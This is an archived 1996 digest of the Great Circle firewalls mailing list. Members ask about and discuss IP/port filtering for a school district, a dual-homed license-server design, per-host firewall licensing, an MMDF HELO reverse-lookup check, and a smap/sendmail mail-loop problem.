ranma.coc.powell-river.bc.ca ([204.174.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA03319 for ; Tue, 9 Jan 1996 04:02:22 -0800 (PST) Received: (from fubar@localhost) by ranma.coc.powell-river.bc.ca (8.6.9/8.6.9) id EAA05318; Tue, 9 Jan 1996 04:41:32 -0800 Date: Tue, 9 Jan 1996 04:41:30 -0800 From: Failed Uni-Bus Address Register Subject: IP/Port Filtering. (Was Re: SSL and S-HTTP Proxy support) To: firewalls@GreatCircle.COM In-Reply-To: <199601081755.LAA21565@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 8 Jan 1996, Rick Smith wrote: [Discussion on SSL and other such stuff snipped..] > The service is based on a generic proxy that tunnels the traffic > through the firewall. Some firewalls (like Sidewinder) can apply > access controls as follows: > > 1) permit/deny traffic according to source IP address. > 2) permit/deny traffic according to destination IP address. > 3) restrict to inbound only or outbound only. > 4) require login/password from browser. We have been considering purchasing a firewall for our local ISP, and I've been reading this list trying to glean information on which setup would be best for us. One of the things we're looking for, and it's something I've not seen mentioned here, is the ability to outgoing traffic based on destination IP/PORT AND source IP. The reasoning behind this being the school district here would like to restrict student access to some services, while still allowing the faculty unrestricted access. Is there a setup that will do this? Is this fairly commonplace? Thanks in advance.. :) Aluve, Warren ---------------------------------------=--------------------------------- = fubar@ranma.coc.powell-river.bc.ca = Powell River Community Network = = Powell River, BC, Canada = System Development Staff = =--------------------------------------=--------------------------------= From firewalls-owner Tue Jan 9 04:29:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA03480 for firewalls-outgoing; Tue, 9 Jan 1996 04:12:33 -0800 (PST) Received: from mailgate.ericsson.se (mailgate.ericsson.se [130.100.2.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA03475 for ; Tue, 9 Jan 1996 04:12:23 -0800 (PST) Received: from poem.emw.ericsson.se (poem.emw.ericsson.se [136.225.97.22]) by mailgate.ericsson.se (8.6.11/1.0) with ESMTP id NAA11541 for ; Tue, 9 Jan 1996 13:11:21 +0100 Received: from shakespeare.emw.ericsson.se (shakespeare.emw.ericsson.se [136.225.97.10]) by poem.emw.ericsson.se (8.6.12/8.6.12) with SMTP id NAA12237 for ; Tue, 9 Jan 1996 13:12:47 +0100 Received: from hathaway.nis.gsunix (hathaway.emw.ericsson.se) by shakespeare.emw.ericsson.se (4.1/LME-DOM-2.2.4) id AA03932; Tue, 9 Jan 96 13:12:24 +0100 Date: Tue, 9 Jan 96 13:12:24 +0100 From: emwmf@emw.ericsson.se (Martin Fredriksson) Message-Id: <9601091212.AA03932@shakespeare.emw.ericsson.se> To: firewalls@greatcircle.com Subject: single service "fw" setup? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have two networks (net1, net2) which are separated for security reasons. I now face the requirement to be able to share network (floating) licenses between these networks (yes, the legal aspects about this sharing have been taken care of...:-). The licens server runs on a Sun machine, and it works by listening to one specified TCP port, over which it recieves and answers license requests. It is possible to run several license servers on the same machine, but it has to be the SAME machine (licenses are locked to hostid). My suggestion, which I would very much appreciate comments to, is to use a dual homed Sun on which I run two instances of the license server, each serving a different port on each of the two interfaces. The Sun is attached to two intermediate networks (fwnet1, fwnet2), which are separated from the production networks (net1, net2) via filtering routers. Something like: net1 fwnet1 fwnet2 net2 ! ! ! ! !--- router ---!--- Sun server ---!--- router ---! ! ! ! ! The Sun machine is configured as defensively as possible (no ip forward, no services but the license servers running chroot:ed as unprivileged user, etc). The router filters are as prohibitive as possible, only allowing traffic to the designated license server TCP ports. I would very much appreciate comments on this suggestion! My main questions are: (1) Are there any obvious problems with this setup? (2) Are there any advantages in replacing/complementing the routers with a bastion-host (fwtk/plug-gw type of thing)? (3) Is there a better solution? Any tips or comments appreciated! Thanks, /// Martin F From firewalls-owner Tue Jan 9 07:14:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA06207 for firewalls-outgoing; Tue, 9 Jan 1996 06:59:22 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA06200 for ; Tue, 9 Jan 1996 06:59:14 -0800 (PST) Received: from pm1-29.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA17357; Tue, 9 Jan 96 09:57:46 -0500 Date: Tue, 9 Jan 96 09:57:46 -0500 Message-Id: <9601091457.AA17357@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Off-Topic: Selling Firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >> Please don't flame me for this (possibly) off-topic question, but I >> think, the best answer for my question is with the members of this great list. >> Wouldn't think of it. >> I started working for a VAR of firewalls and other network related >> products. When it comes to writing proposals, I feel there must be >> tools to effectively support the selling process >> >> - how to draw network designs I would recommend a grahics package called VISIO from the Shapeware Corp. (I believe their hopepage is http://www.visio.com). Their Windows-based product features "drag and drop" design capability. Another advantage is the fact that it runs on a laptop which makes it easy to update diagrams for customer-specific presentations while on the road (but not while driving). 8^) The product is available in most large computer stores. I don't remember what I paid for the software, but it was worth it in the time it saved me. (The markup on software in Europe is truly abominable). Assuming you know how you want the drawing to look like, you can put together a drawing in @15 minutes. The stencils for network diagrams are included in the" VISIO for Business Graphics" package which should suffice for what you need to do. They also have a Network diagram package which includes more network stencils for you (again, you probably won't need it). >> - how to calculate network topology, eg. IP-numbers and netmasks It really depends on what you want to look at (do you just want to figure out what protocols are out there, or do you want to have it draw a network topology diagram for you). Take a look at Network General, HP, DEC, Sun, etc. >> - how to calculate the costs for the equipment (firewalls, routers ...) >> - how to ... This also depends. Since you are a VAR, you are kind of stuck in your pricing & your ability to be neutral in recommending products to your customers (I don't have this problem). I know many companies (sadly) which have a markup of 200-300% of american products in Europe to take into account the currency fluctuations and keep the product price fairly stable. Don't forget to build a "fudge factor" in figuring out lead times in getting products delivered just in case the equipment doesn't arrive on the day you expect it to (snowstorms, strikes, government shutdowns, etc.). Another alternative is to tie the price of the equipment to the US dollar costs, add your profit margin, and hope the dollar stays stable enough until your next catalogue comes out. 8^) Given the current value of the dollar (undervalued IMHO), this may be a prudent move for now, anyway, you may want to change later (your mileage may vary, of course). Another thing you can do is to look at your competitor's prices and plot your course from there. Also, no matter which firewalls, routers, or other equipment you choose, try to find the best security product which represents the best value (including price & ability to provide adequate security) to the customer. >> >> How do you network consultants and reseller work out there, how do >> you make your life easier when it comes to desktop work. I feel >> there are better tools than M$-Word or Powerpoint to generate good >> proposals and solutions. >> >> TIA, Andreas >> -- Andreas Grau grau@muc.de Rather than spawn a PC vs Mac vs Workstation thread, I'll just say it just depends on your personal preferences. Two important features in whatever product you select are portability & reliability. You will definitely want to take the computer with you on the road & systems which are taken on the road suffer a fair amount of abuse. Having a system die on the way to a customer site won't work wonders for your image. BTW, don't forget to take into consideration the physical weight of the computer you are going to carry through airports, parking lots, endless corridors, etc. Laptop-size computers are truly wonderful devices. Hope the above helps you get started. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Tue Jan 9 08:59:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA08356 for firewalls-outgoing; Tue, 9 Jan 1996 08:53:25 -0800 (PST) Received: from aspensys ([198.77.70.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA08351 for ; Tue, 9 Jan 1996 08:53:21 -0800 (PST) Received: from smtpinet.aspensys.com (smtpgate.aspensys.com) by aspensys (5.0/SMI-SVR4) id AA27172; Tue, 9 Jan 1996 11:46:24 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA821218226; Tue, 09 Jan 96 12:09:35 EST Date: Tue, 09 Jan 96 12:09:35 EST From: "Jim Meritt" Message-Id: <9600098212.AA821218226@smtpinet.aspensys.com> To: firewalls@GreatCircle.com Subject: charlatan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk When email is received, some places apparently check a couple of things (from field and ...?) and if they do not match (?) print the error message "You are a charlatan" and do not accept the mail. What are they checking? We appear to be a site which doesn't satisfy the checks from some places, and I REALLY want to be able to re-match... Jim Meritt From firewalls-owner Tue Jan 9 09:14:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA08547 for firewalls-outgoing; Tue, 9 Jan 1996 09:02:32 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA08542 for ; Tue, 9 Jan 1996 09:02:28 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17121; Tue, 9 Jan 1996 11:01:29 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17116; Tue, 9 Jan 1996 11:01:28 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id LAA00891; Tue, 9 Jan 1996 11:02:04 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA04266; Tue, 9 Jan 1996 11:02:05 -0600 Date: Tue, 9 Jan 1996 11:02:05 -0600 From: Rick Smith Message-Id: <199601091702.LAA04266@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, jamessoh@tdb.gov.sg Subject: Re: Fw License Sender: firewalls-owner@GreatCircle.COM Precedence: bulk James Soh asks: >Is the Fw-license based on the number of internal IP addresses it protects? It probably depends on the vendor. Sidewinder is sold as a device, so the costs are related to the number of Sidewinders bought, not the traffic each one handles. Does anyone perceive a benefit to sites in charging according to the number of hosts protected? Is there some situation in which such charges might make sense? Rick. smith@sctc.com secure computing corporation From firewalls-owner Tue Jan 9 10:02:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA08349 for firewalls-outgoing; Tue, 9 Jan 1996 08:53:07 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA08344 for ; Tue, 9 Jan 1996 08:53:03 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id IAA14732; Tue, 9 Jan 1996 08:50:19 -0800 Received: from bprevisora.fin.ec(157.100.183.2) by mycroft via smap (V1.3mjr) id sma014718; Tue Jan 9 08:49:20 1996 Received: from oscar by bprevisora.fin.ec with smtp (Smail3.1.28.1 #8) id m0tZj4R-0001KMC; Tue, 9 Jan 96 10:46 PST Message-Id: From: "Oscar Schneegans" Organization: Banco La Previsora To: Firewalls@GreatCircle.COM Date: Tue, 9 Jan 1996 11:01:24 -500 Subject: Where we get it Reply-to: previco2@previcompu.com.ec X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: mcb@GreatCircle.COM (Michael C. Berch) We're looking for an Internet Security software solution, something like how the firewall concept or something other product Our basic problem is the matching of the Bank's private IP Address type B and the Bank's assigned Internet Address type C ; regarding the security matter and the possibility of anyone station inside the private network , to be allowed of access the Internet world masked with the corresponding type C Address . Atte. Ing. Oscar Schneegans Please contact us the soon as posible Thanks a million Phone: 566100 Ext-Fax :1100 563100 515000 Internet: oscar@bprevisora.fin.ec From firewalls-owner Tue Jan 9 10:12:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA08272 for firewalls-outgoing; Tue, 9 Jan 1996 08:51:16 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA08259 for ; Tue, 9 Jan 1996 08:51:11 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id KAA16680; Tue, 9 Jan 1996 10:49:12 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id KAA16676; Tue, 9 Jan 1996 10:49:12 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id KAA00648; Tue, 9 Jan 1996 10:49:48 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id KAA03813; Tue, 9 Jan 1996 10:49:49 -0600 Date: Tue, 9 Jan 1996 10:49:49 -0600 From: Rick Smith Message-Id: <199601091649.KAA03813@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, fubar@ranma.coc.powell-river.bc.ca Subject: Re: IP/Port Filtering. (Was Re: SSL and S-HTTP Proxy support) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fubar of Powell River, BC writes: >We have been considering purchasing a firewall for our local ISP, and >I've been reading this list trying to glean information on which setup >would be best for us. > One of the things we're looking for, and it's >something I've not seen mentioned here, is the ability to outgoing >traffic based on destination IP/PORT AND source IP. > ... Is this fairly commonplace? The technique isn't hard to implement, so it's probably pretty common. Sidewinder has it. The only "gotcha" is that a long list of access permissions may eventually bog down the machine. Note that it only works as long as different classes of users (students, faculty) always use different IP addresses. Rick. smith@sctc.com secure computing corporation From firewalls-owner Tue Jan 9 10:29:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10093 for firewalls-outgoing; Tue, 9 Jan 1996 10:18:15 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10081 for ; Tue, 9 Jan 1996 10:18:11 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id KAA15402; Tue, 9 Jan 1996 10:15:26 -0800 Received: from unknown(206.0.206.200) by mycroft via smap (V1.3mjr) id sma015381; Tue Jan 9 10:14:49 1996 Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id KAA14356; Tue, 9 Jan 1996 10:13:32 -0800 (PST) From: David Kovar Message-Id: <199601091813.KAA14356@taz.nda.com> Subject: Re: Fw License To: jamessoh@tdb.gov.sg (James Soh) Date: Tue, 9 Jan 1996 10:13:31 -0800 (PST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <30F2AF7E@smtpgw.tdb.gov.sg> from "James Soh" at Jan 1, 80 05:44:00 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Is the Fw-license based on the number of internal IP addresses it protects? FW-1 "Light" will protect a 50 node network. FW-1 "Mid" will do 250 hosts. FW-1 is unlimited. > If our organisation has exceeded this IP protection, according to sources, > it is unenforcible now, how will the FW behaves? It will complain loudly and fill up your log files while doing so if it detects more than the licensed number of hosts. Sure, you can get around this, but it goes against the license. If you've purchased more than 50 pieces of hardware, you can afford the incremental cost in the FW-1 to protect them. Add $100 to the cost of each machine and you're there. -David From firewalls-owner Tue Jan 9 10:59:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10711 for firewalls-outgoing; Tue, 9 Jan 1996 10:57:20 -0800 (PST) Received: from hub.impulse.net (hub.impulse.net [204.188.6.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10706 for ; Tue, 9 Jan 1996 10:57:17 -0800 (PST) Received: from home.impulse.net.impulse.net (home.impulse.net [204.188.6.11]) by hub.impulse.net (8.6.12/8.6.12) with SMTP id KAA14288 for ; Tue, 9 Jan 1996 10:57:59 -0800 Date: Tue, 9 Jan 1996 10:57:59 -0800 Message-Id: <199601091857.KAA14288@hub.impulse.net> X-Sender: lena@hub.impulse.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: lena@hub.impulse.net (Lena Alker) Subject: weird e-mail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk TEST MESSAGE a user on our system rec'd mail sent to this address, just trying to duplicate /********************************************************************* lena@impulse.net (Lena Alker, Impulse Engineering, Impulse Internet) PCB Designer specializing in PCB layout, assembly, and manufacturing *********************************************************************/ From firewalls-owner Tue Jan 9 11:55:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11330 for firewalls-outgoing; Tue, 9 Jan 1996 11:14:23 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11311 for ; Tue, 9 Jan 1996 11:14:18 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id LAA15845; Tue, 9 Jan 1996 11:11:33 -0800 Received: from su1.in.net(199.0.62.2) by mycroft via smap (V1.3mjr) id sma015839; Tue Jan 9 11:10:46 1996 Received: from pm2-03.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA00580; Tue, 9 Jan 96 14:11:27 -0500 Date: Tue, 9 Jan 96 14:11:27 -0500 Message-Id: <9601091911.AA00580@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Attention Firewall Vendors (user->firewall encryption) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Attention firewall vendors, If your firewall supports/uses user->firewall encryption, I would appreciate it if you would give me a call at (317) 573-0800 and send me some literature at the following address: Fortified Networks Inc. 33 Harrowgate Drive Carmel, IN 46033 USA The info is necessary for an upcoming project. More details will be given to those who will respond. There is a potential sales opportunity to those who repond. In the interests of saving my time and yours, please respond only if your firewall supports user->firewall encryption. (It is assumed that your product already supports firewall->firewall encryption). Please feel free to e-mail me or call me at the number listed below. Thanks in advance for your help. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Tue Jan 9 12:14:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12941 for firewalls-outgoing; Tue, 9 Jan 1996 11:32:39 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA12936 for ; Tue, 9 Jan 1996 11:32:34 -0800 (PST) Received: from clark.net (clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id OAA02042; Tue, 9 Jan 1996 14:30:50 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id OAA17592; Tue, 9 Jan 1996 14:30:49 -0500 (EST) Date: Tue, 9 Jan 1996 14:30:49 -0500 (EST) From: "Paul D. Robertson" To: Rick Smith cc: firewalls@GreatCircle.COM Subject: Re: Fw License In-Reply-To: <199601091702.LAA04266@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jan 1996, Rick Smith wrote: > > It probably depends on the vendor. Sidewinder is sold as a device, so > the costs are related to the number of Sidewinders bought, not the > traffic each one handles. > > Does anyone perceive a benefit to sites in charging according to the > number of hosts protected? Is there some situation in which such > charges might make sense? > I could *almost* see it for chargeback accounting internally within a company. Internally though I'd see the politics being easier for charging back based on proxy usage, number of IP devices, or some less specific metric which is a little more easily measureable. I don't see how you would do it with reliability, unless you have a very small setup. Do SNA machines count as protected because there are machines inside the parimiter running IP and SNA? IPX? How many of us have much of an idea how many machines are connected at a give moment, given WAN links, dial-up, laptop users, etc? I have a few networks and network access points at my desk. Only one device is on the production networks 99% of the time, how do you count the rest? I know there is some merit to having the answers, I just can imagine how you'd (ok, not a really theoretical you, a very untheoretical me) keep a handle on it. Even putting a sniffer on each subnet for three days would take longer than you could keep current, and leave a fairly high margin of error. That margin of error would scare me away from a contract or licence, let alone WAN links, and departments with enough autonomy to merit their very own packet screens. Also, if you have multiple devices compromising your firewall, is the bastion bearing the brunt of protecting the network? If you buy parts of your firewall strategy on a normal pricing model, and part on machines on the other side, it's going to throw off the dollars when one cost goes up over time, and the others decrease. Small networks with chargeback accounting are the only place I could see this, and I'd envy the heck out of them :) Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Tue Jan 9 12:17:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12085 for firewalls-outgoing; Tue, 9 Jan 1996 11:25:31 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11853 for ; Tue, 9 Jan 1996 11:24:52 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id KAA15686; Tue, 9 Jan 1996 10:51:31 -0800 Received: from cfg.cfg.com(192.84.10.3) by mycroft via smap (V1.3mjr) id sma015682; Tue Jan 9 10:50:44 1996 Received: from p1.cfg.com (p1.cfg.com [192.84.10.11]) by cfg.cfg.com (8.6.11/CFG-950329) with SMTP id KAA07544; Tue, 9 Jan 1996 10:51:10 -0800 Message-Id: <2.2.16.19960109185111.4d7f2ab0@mail.cfg.com> X-Sender: shc@mail.cfg.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 09 Jan 1996 10:51:11 -0800 To: "Jim Meritt" From: Steve Caine Subject: Re: charlatan Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:09 01/09/96 EST, you wrote: > When email is received, some places apparently check a couple of > things (from field and ...?) and if they do not match (?) print the > error message "You are a charlatan" and do not accept the mail. > > What are they checking? Such sites may be running MMDF's SMTP daemon. It reverses your IP number and makes sure it matches the name you give in the HELO command. If it doesn't, it returns "250 xxx - you are a charlatan" where xxx is the argument you gave in the HELO. Steve. From firewalls-owner Tue Jan 9 12:44:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12707 for firewalls-outgoing; Tue, 9 Jan 1996 11:27:53 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA12302 for ; Tue, 9 Jan 1996 11:26:18 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id JAA15247; Tue, 9 Jan 1996 09:56:24 -0800 Received: from hnc.hnc.com(206.79.10.2) by mycroft via smap (V1.3mjr) id sma015243; Tue Jan 9 09:55:37 1996 Received: (from uucp@localhost) by hnc.hnc.com (8.7.1/8.7.1) id KAA07625 for ; Tue, 9 Jan 1996 10:11:30 -0800 (PST) Received: from serval.hnc.com(206.79.54.2) by hnc.hnc.com via smap (V1.3) id sma007623; Tue Jan 9 10:11:24 1996 Received: from spike.hnc.com (spike.hnc.com [191.9.201.52]) by serval.hnc.com (8.7.1/8.7.1) with ESMTP id KAA01999 for ; Tue, 9 Jan 1996 10:01:29 -0800 (PST) Received: from fred.hnc.com (fred.hnc.com [191.9.204.7]) by spike.hnc.com (8.7.1/8.7.1) with SMTP id JAA06719 for ; Tue, 9 Jan 1996 09:58:50 -0800 (PST) Message-Id: <199601091758.JAA06719@spike.hnc.com> Received: from pcdwl.hnc.com by fred.hnc.com with SMTP (1.38.193.4/16.2) id AA12765; Tue, 9 Jan 1996 10:03:10 -0800 X-Sender: dwl@spike X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 09 Jan 1996 17:58:18 -0800 To: firewalls@greatcircle.com From: David Loysen Subject: Re: Off-Topic: Selling Firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:57 AM 1/9/96 -0500, you wrote: >> >> >>> Please don't flame me for this (possibly) off-topic question, but I >>> think, the best answer for my question is with the members of this great >list. >>> > >Wouldn't think of it. > > >>> I started working for a VAR of firewalls and other network related >>> products. When it comes to writing proposals, I feel there must be >>> tools to effectively support the selling process >>> Stuff Chopped---- Also you can try pinging on your vendors. I think 3Com, Cisco and Bay all have proposal writing software available for their resellers. dwl@hnc.com HNC Software Inc. David Loysen 5930 Cornerstone Ct. West (619) 546-8877 x245 San Diego, CA 92121-3728 fax (619) 452-6524 From firewalls-owner Tue Jan 9 12:59:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12750 for firewalls-outgoing; Tue, 9 Jan 1996 11:28:04 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA12392 for ; Tue, 9 Jan 1996 11:26:38 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id JAA15238; Tue, 9 Jan 1996 09:55:24 -0800 Received: from su1.in.net(199.0.62.2) by mycroft via smap (V1.3mjr) id sma015233; Tue Jan 9 09:55:08 1996 Received: from pm4-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA27180; Tue, 9 Jan 96 12:55:45 -0500 Date: Tue, 9 Jan 96 12:55:45 -0500 Message-Id: <9601091755.AA27180@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Fw License Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Rick Smith: >James Soh asks: > >>Is the Fw-license based on the number of internal IP addresses it protects? > >It probably depends on the vendor. Sidewinder is sold as a device, so >the costs are related to the number of Sidewinders bought, not the >traffic each one handles. > >Does anyone perceive a benefit to sites in charging according to the >number of hosts protected? Is there some situation in which such >charges might make sense? > >Rick. >smith@sctc.com secure computing corporation Some vendors do this as a means to undercut their competitors. They are using the firewall product as a type of software license and use it to scale the price of the firewall (making it dependent on the number of hosts/users it is to support). It is particularly useful in small companies which only have a handful of systems to protect and don't expect any growth anytime soon and/or have very limited budgets. In spite of this, I personally am not in favor of this type of approach. Sudden growth (mergers, acquisitions, etc) could impact the licensing of the firewall & either get the customer in hot water with SPA or the vendor or face a denial-of-service for those extra connections until the customer remembers to get an upgraded license. This could be rather interesting if the person who ordered the firewall or was familiar with the licensing scheme wasn't around when the number of connections exceeded the license & no one else had a clue what was going on. 8^( Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Tue Jan 9 13:44:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA15802 for firewalls-outgoing; Tue, 9 Jan 1996 13:23:48 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA15642 for ; Tue, 9 Jan 1996 13:23:21 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id NAA17382; Tue, 9 Jan 1996 13:19:03 -0800 Received: from callisto.eci-esyst.com(199.186.17.2) by mycroft via smap (V1.3mjr) id sma017372; Tue Jan 9 13:18:04 1996 Received: by eci-esyst.com (4.1/SMI-4.1) id AA11587; Tue, 9 Jan 96 16:14:29 EST Received: from rodney.eci-esyst.com(199.186.17.5) by callisto.eci-esyst.com via smap (V1.3mjr) id sma011558; Tue Jan 9 16:13:36 1996 Received: from qmgate (qmgate.eci-esyst.com) by callisto (4.1/SMI-4.1) id AA02343; Tue, 9 Jan 96 16:14:59 EST Message-Id: Date: 9 Jan 1996 16:12:06 -0500 From: "Tim Darnauer" Subject: smap/smapd question To: "firewalls*GreatCircle.COM" X-Mailer: Mail*Link SMTP-QM 3.0.2 Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1"; Name="Message Body" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk smap/smapd question via Mail*Link=AE for = PowerTalk*/QM The problem is that mail destined for the Internet is queued by sendmail = if the destination host is down. Mail destined for a host on the inside = (protected) network is not queued by sendmail if the internal mail host = is down. Instead I get a "mail loop" and the message is returned to the = sender after 30 hops. Does anyone know how or why smap, smapd, and sendmail are doing this? = Obviously I have a problem with my configuration but I've run out of = ideas. Thanks, Tim From firewalls-owner Tue Jan 9 13:59:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA15804 for firewalls-outgoing; Tue, 9 Jan 1996 13:23:49 -0800 (PST) Received: from 